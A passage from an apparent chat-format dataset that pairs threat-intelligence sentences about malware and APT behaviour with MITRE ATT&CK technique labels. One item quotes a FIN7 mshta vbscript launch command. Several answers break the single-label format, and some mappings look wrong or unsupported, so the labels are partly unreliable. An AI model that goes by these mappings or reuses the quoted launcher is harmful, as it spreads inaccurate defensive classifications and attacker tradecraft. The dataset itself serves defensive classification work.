}, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Naikon has used a netbios scanner for remote machine identification." }, { "role": "assistant", "content": "T1018 - Remote System Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Based on the McAfee Advanced Threat Research team’s analysis, we find multiple components from this operation are unique from a code perspective, even though the code is loosely based on previous versions of the SYSCON backdoor" }, { "role": "assistant", "content": "T1140 - Deobfuscate/Decode Files or Information', 'T1027.001 - Obfuscated Files or Information: Binary Padding" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "ObliqueRAT has gained execution on targeted systems through luring users to click on links to malicious URLs." }, { "role": "assistant", "content": "T1204.001 - Malicious Link" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "OnionDuke has the capability to use a Denial of Service module." }, { "role": "assistant", "content": "T1499 - Endpoint Denial of Service" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Magic Hound gathered credentials from two victims that they then attempted to validate across 75 different websites." }, { "role": "assistant", "content": "T1589.001 - Credentials" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "NetPass.exe: a legitimate utility developed by NirSoft that recovers all network passwords stored on a system for the current logged-on user. This tool can also recover passwords stored in the credentials file of external drives. WebBrowserPassView: a password recovery tool that captures passwords stored by Internet Explorer, Mozilla Firefox, Google Chrome, Safari, and Opera and passes them to the credential enumerator module. Mail PassView: a password recovery tool that reveals passwords and account details for various email clients such as Microsoft Outlook, Windows Mail, Mozilla Thunderbird, Hotmail, Yahoo. Mail, and Gmail and passes them to the credential enumerator module. Once an available system is found, Emotet then writes the service component on the system, which writes Emotet onto the disk" }, { "role": "assistant", "content": "T1552.001 - Unsecured Credentials: Credentials In Files" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "ZxShell has used HTTP for C2 connections." }, { "role": "assistant", "content": "T1071.001 - Application Layer Protocol: Web Protocols" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "BackdoorDiplomacy has exploited CVE-2020-5902, an F5 BIP-IP vulnerability, to drop a Linux backdoor. BackdoorDiplomacy has also exploited mis-configured Plesk servers." }, { "role": "assistant", "content": "T1190 - Exploit Public-Facing Application" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Firstly, the reason this has been named MirageFox instead of just Mirage, is because in the Export directory for the modules, the name field is filled with a string MirageFox_Server.dat" }, { "role": "assistant", "content": "T1036 - Masquerading" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "SombRAT has the ability to run \"cancel\" or \"closeanddeletestorage\" to remove all files from storage and delete the storage temp file on a compromised host." }, { "role": "assistant", "content": "T1070.004 - Indicator Removal on Host: File Deletion" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Sodinokibi ransomware, also known as REvil or Sodin, has been responsible for a series of high-profile attacks since April 2019" }, { "role": "assistant", "content": "T1204.002 - User Execution: Malicious File" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "FIN7 sent spearphishing emails with either malicious Microsoft Documents or RTF files attached." }, { "role": "assistant", "content": "T1566.001 - Phishing: Spearphishing Attachment" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "can gather victim proxy information." }, { "role": "assistant", "content": "T1016 - System Network Configuration Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "1) Communicate with the C2, try to forward ports with UPnP and determine available ports and report them to the C2. The usual C2 communication protocol used here is HTTP POST RC4-ciphered JSON data. Instead of saving the downloaded file, QakBot measures the download speed and deletes the received file. 3) Set up external PROXY-C2 connection that was received with command 37 (update config)/module 274 (proxy) by the stager" }, { "role": "assistant", "content": "T1071.001 - Application Layer Protocol: Web Protocols" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "HAWKBALL is a backdoor that communicates to a single hard-coded C2 server using HTTP. The C2 server is obtained from the decrypted config file, as shown in Figure 5" }, { "role": "assistant", "content": "T1071.001 - Application Layer Protocol: Web Protocols" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Once in the folder, this property list (plist) file will launch the CrashReporter program with the Maintain parameter on system load as Root for every user. Because the LaunchDaemon will not run automatically after the plist file is moved, the postinstall script launches CrashReporter with the Maintain parameter and runs it in the background (Create or Modify System Process: Launch Daemon [T1543.004" }, { "role": "assistant", "content": "T1569.001 - System Services: Launchctl" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "used a rootkit to modify typical server functionality." }, { "role": "assistant", "content": "T1014 - Rootkit" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "For example, we analyzed a DropIt sample (SHA256: cca268c13885ad5751eb70371bbc9ce8c8795654fedb90d9e3886cbcfe323671) that dropped two executables, one of which was saved to “%TEMP%\\flash_update.exe” that was a legitimate Flash Player installer" }, { "role": "assistant", "content": "T1036 - Masquerading" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Chinese state-sponsored cyber actors have been observed using the New-MailboxExportRequest PowerShell cmdlet to export target email boxes." }, { "role": "assistant", "content": "T1114 - Email Collection" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "TEMP.Veles has obtained and used tools such as Mimikatz and PsExec." }, { "role": "assistant", "content": "T1588.002 - Tool" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Crimson can identify the user on a targeted system." }, { "role": "assistant", "content": "T1033 - System Owner/User Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "copies an executable payload to the target system by using and then scheduling an unnamed task to execute the malware." }, { "role": "assistant", "content": "T1053.005 - Scheduled Task/Job: Scheduled Task" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The attackers orchestrate attacks using batch or PowerShell scripts that are executed, with the help of domain controllers, on any machine the DC can reach. The scripts retrieve the attackers’ payloads using psexec or certutil" }, { "role": "assistant", "content": "T1105 - Ingress Tool Transfer', 'T1569.002 - System Services: Service Execution', 'T1059.003 - Command and Scripting Interpreter: Windows Command Shell" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The majority of 2017 and 2018 Karagany samples analyzed by CTU researchers were packed using a custom packer, albeit a reasonably simple one that performs a number of binary shifts and logic operations. Karagany campaigns in 2016 and prior typically used the UPX packer as an additional layer of obfuscation, but this behavior was not observed in 2017-2018 samples. Breaking on this function call in a debugger allows an analyst to dump the process and extract the unpacked Karagany binary for further analysis" }, { "role": "assistant", "content": "T1027.002 - Obfuscated Files or Information: Software Packing" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The threat actors can execute remote commands by running this specialized module with predefined actions. This module attempts to execute a command. It uses the PowerShell Invoke-Expression method for the PowerShell-based module, while its C# implementation has both cmd and PowerShell options" }, { "role": "assistant", "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Magic Hound has exported emails from compromised Exchange servers." }, { "role": "assistant", "content": "T1114.002 - Email Collection: Remote Email Collection" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "During Operation Sharpshooter, a first-stage downloader installed Rising Sun to `%Startup%\\mssync.exe` on a compromised host." }, { "role": "assistant", "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Chaos conducts brute force attacks against SSH services to gain initial access." }, { "role": "assistant", "content": "T1110 - Brute Force" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "is used to patch an enterprise domain controller authentication process with a backdoor password. It allows adversaries to bypass the standard authentication system to use a defined password for all accounts authenticating to that domain controller." }, { "role": "assistant", "content": "T1098 - Account Manipulation" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "NanoCore has the capability to download and activate additional modules for execution." }, { "role": "assistant", "content": "T1105 - Ingress Tool Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Earth Lusca used the command \"ipconfig\" to obtain information about network configurations." }, { "role": "assistant", "content": "T1016 - System Network Configuration Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "After the execution of rundll32.exe, the PowerShell script enu.ps1 is executed. This script is encoded with Base64 in order to avoid detection by antivirus products" }, { "role": "assistant", "content": "T1027 - Obfuscated Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Stolen digital certificate re-use" }, { "role": "assistant", "content": "T1588.004 - Digital Certificates" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "BlackEnergy has removed the watermark associated with enabling the \"TESTSIGNING\" boot configuration option by removing the relevant strings in the \"user32.dll.mui\" of the system." }, { "role": "assistant", "content": "T1070 - Indicator Removal on Host" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "APT1 has sent spearphishing emails containing malicious attachments." }, { "role": "assistant", "content": "T1566.001 - Phishing: Spearphishing Attachment" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "RARM Creates RAR files per logical drive containing data with timestamps for the past 30 days, then uploads RAR to the C2 server using a POST command at the path “/FeedBack.php”" }, { "role": "assistant", "content": "T1560 - Archive Collected Data" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Figure 1: Malicious FIN7 lure asking victim to double click to unlock contents The malicious LNK launches “mshta.exe” with the following arguments passed to it: vbscript:Execute(\"On Error Resume Next:set w=GetObject(,\"\"Word.Application\"\"):execute w.ActiveDocument.Shapes(2).TextFrame.TextRange.Text:close\") The script in the argument combines all the textbox contents in the document and executes them, as seen in Figure 2" }, { "role": "assistant", "content": "T1204 - User Execution" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Exaramel for Windows adds the configuration to the Registry in XML format." }, { "role": "assistant", "content": "T1112 - Modify Registry" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "APT19 leveraged Rich Text Format (RTF) and macro-enabled Microsoft Excel (XLSM) files to deliver their initial exploits" }, { "role": "assistant", "content": "T1566.001 - Phishing: Spearphishing Attachment" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The macro uses PowerShell to download a shellcode-based payload from a remote server using one of two available techniques" }, { "role": "assistant", "content": "T1546.013 - Event Triggered Execution: PowerShell Profile', 'T1059.001 - Command and Scripting Interpreter: PowerShell" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "can enumerate local information for Linux hosts and find currently logged on users for Windows hosts." }, { "role": "assistant", "content": "T1033 - System Owner/User Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Mythic can use SOCKS proxies to tunnel traffic through another protocol." }, { "role": "assistant", "content": "T1572 - Protocol Tunneling" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Log.php validates the sender by User-Agent, saves the data in the “UP” server directory and stores the metadata in the mssql database for later reference" }, { "role": "assistant", "content": "T1074 - Data Staged" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "njRAT enumerates the current user during the initial infection." }, { "role": "assistant", "content": "T1033 - System Owner/User Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "gathers information about local groups and members." }, { "role": "assistant", "content": "T1069 - Permission Groups Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Figure 11 Embedded BMP file containing encrypted string data RC4 is used to decrypt this data using a 16-byte key that is stored within the BMP file at offset 0x502" }, { "role": "assistant", "content": "T1140 - Deobfuscate/Decode Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "may create a temporary user on the system named “Lost_{Unique Identifier}” with the password “pond~!@6”{Unique Identifier}.”" }, { "role": "assistant", "content": "T1136 - Create Account" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Once these variables are set, the malware uses the SoapHttpClientProtocol class to communicate with its C2 server, which issues an HTTP POST requests that appears as: As you can see from the above request, the SoapHttpClientProtocol class neatly structures data into an HTTP POST request" }, { "role": "assistant", "content": "T1071 - Application Layer Protocol" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "contains a copy of the OpenSSL library to encrypt C2 traffic." }, { "role": "assistant", "content": "T1573 - Encrypted Channel" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "RTM uses the command line and rundll32.exe to execute." }, { "role": "assistant", "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "collects the MAC address, computer name, and CPU information." }, { "role": "assistant", "content": "T1082 - System Information Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "RTM has the ability to remove Registry entries that it created for persistence." }, { "role": "assistant", "content": "T1070.009 - Clear Persistence" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Gelsemium can compress embedded executables with the zlib library." }, { "role": "assistant", "content": "T1560.002 - Archive Collected Data: Archive via Library" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "KeyBoy uses custom SSL libraries to impersonate SSL in C2 traffic." }, { "role": "assistant", "content": "T1001.003 - Protocol or Service Impersonation" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Modules can be pushed to and executed by that copy data to a staging area, compress it, and XOR encrypt it." }, { "role": "assistant", "content": "T1560 - Archive Collected Data', 'T1486 - Data Encrypted for Impact', 'T1074 - Data Staged" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Some Sakula samples install themselves as services for persistence by calling WinExec with the \"net start\" argument." }, { "role": "assistant", "content": "T1543.003 - Create or Modify System Process: Windows Service" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "BackConfig has the ability to use scheduled tasks to repeatedly execute malicious payloads on a compromised host." }, { "role": "assistant", "content": "T1053.005 - Scheduled Task/Job: Scheduled Task" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The malware uploads the stolen data to third-party cloud storage providers. The sample identified in the wild is configured to upload to pCloud, but functionality to upload to Dropbox, Box and Yandex Cloud is also included" }, { "role": "assistant", "content": "T1102.002 - Bidirectional Communication" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The function hashing algorithm is used to map a hash value of a given function name to its corresponding location in memory using a process known as Run-Time Dynamic Linking. Pre-computed hashes are passed to the hashing algorithm alongside the Windows library containing the related function name. Each function name within the library is hashed; when a match is found, its address is saved" }, { "role": "assistant", "content": "T1027 - Obfuscated Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The execution chain ensures that persistence is set on the affected system using a .lnk file in the Startup directory. The .lnk file shown in Figure 17 opens the malicious VBS dropped on the system" }, { "role": "assistant", "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "After the botnets of direct ZeuS successors were taken down, Dridex’s time came. This malware is a result of Bugat evolution (which appeared in 2010). Bugat v5 was recognized as Dridex in 2014." }, { "role": "assistant", "content": "T1587.001 - Malware" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "allows actors to spawn a reverse shell on a victim." }, { "role": "assistant", "content": "T1059 - Command and Scripting Interpreter" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Similar to its dropper, the binary seeks to evade sandboxes. In addition to the previously described trick EvilBunny performs hook detection to trick environments which hook time retrieval APIs. These are NtQuerySystemTime, GetSystemTimeAsFileTime and GetTickCount. Every API is called twice to calculate a delta, while performing a sleep(1000) operation between iteration one and iteration two. This can only be the case if any of the three API’s return values is modified by a system monitoring solution, like a sandbox" }, { "role": "assistant", "content": "T1124 - System Time Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "SUGARDUMP has stored collected data under `%%\\\\CrashLog.txt`." }, { "role": "assistant", "content": "T1074.001 - Data Staged: Local Data Staging" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Axiom has used watering hole attacks to gain access." }, { "role": "assistant", "content": "T1189 - Drive-by Compromise" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "It uses a GetCurrentProcessID to find the process ID of the current process. It compares the UniqueProcessID member of the SYSTEM_HANDLE_TABLE_ENTRY_INFO_EX structure with the current process ID" }, { "role": "assistant", "content": "T1057 - Process Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Threat Group-3390 obtained a KeePass database from a compromised host." }, { "role": "assistant", "content": "T1555.005 - Password Managers" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "has cleared logs during post compromise cleanup activities." }, { "role": "assistant", "content": "T1070 - Indicator Removal on Host" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Waterbear has used DLL side loading to import and load a malicious DLL loader." }, { "role": "assistant", "content": "T1574.002 - Hijack Execution Flow: DLL Side-Loading" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "OilRig has used PowerShell scripts for execution, including use of a macro to run a PowerShell command to decode file contents." }, { "role": "assistant", "content": "T1059.001 - Command and Scripting Interpreter: PowerShell" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "If the bot is running with a regular user privilege, persistence is established using the registry “Run” method. The loader DLL component is written to “%APPDATA%\\mswinload[.]dll” and a “mswinload” value is added to the “Run” key to execute ordinal #1 of the DLL with rundll32[.]exe" }, { "role": "assistant", "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "encodes C2 traffic with Base64." }, { "role": "assistant", "content": "T1132 - Data Encoding" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "PowerSploit can be used as a tool for the discovery of stored credentials. Specifically it supports the following modules which will check for credentials encrypted or plain-text in various files and in the registry" }, { "role": "assistant", "content": "T1552.002 - Unsecured Credentials: Credentials in Registry" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "XCSSET uses AppleScript to check the host's language and location with the command \"user locale of (get system info)\"." }, { "role": "assistant", "content": "T1614.001 - System Location Discovery: System Language Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The command index table and command handler address table.  Implant Capabilities Based on the responses received from the control server, the malware can carry out the following malicious tasks: Recursively generate a list of files in a directory and send to the control server Terminate a specific process" }, { "role": "assistant", "content": "T1102 - Web Service" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Both responses instruct the malware to download and load a remote plugin" }, { "role": "assistant", "content": "T1105 - Ingress Tool Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Actors likely used net share command to display information about shared resources on the local computer and decide which directories to exploit, the powershell dir command to map shared drives to a specified path and retrieve items from another, and the ntfsinfo command to search network shares on computers they have compromised to find files of interest. The actors used dir.exe to display a list of a directory's files and subdirectories matching a certain text string." }, { "role": "assistant", "content": "T1039 - Data from Network Shared Drive" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "VBShower has attempted to obtain a VBS script from command and control (C2) nodes over HTTP." }, { "role": "assistant", "content": "T1071.001 - Application Layer Protocol: Web Protocols" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Aquatic Panda has deleted malicious executables from compromised machines." }, { "role": "assistant", "content": "T1070.004 - Indicator Removal on Host: File Deletion" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "XAgentOSX contains the deletFileFromPath function to delete a specified file using the NSFileManager:removeFileAtPath method." }, { "role": "assistant", "content": "T1070.004 - Indicator Removal on Host: File Deletion" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "SUNBURST removed IFEO registry values to clean up traces of persistence." }, { "role": "assistant", "content": "T1070.009 - Clear Persistence" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "uses tasklist /v to check running processes." }, { "role": "assistant", "content": "T1057 - Process Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "APT29 used the \"Get-ManagementRoleAssignment\" PowerShell cmdlet to enumerate Exchange management role assignments through an Exchange Management Shell." }, { "role": "assistant", 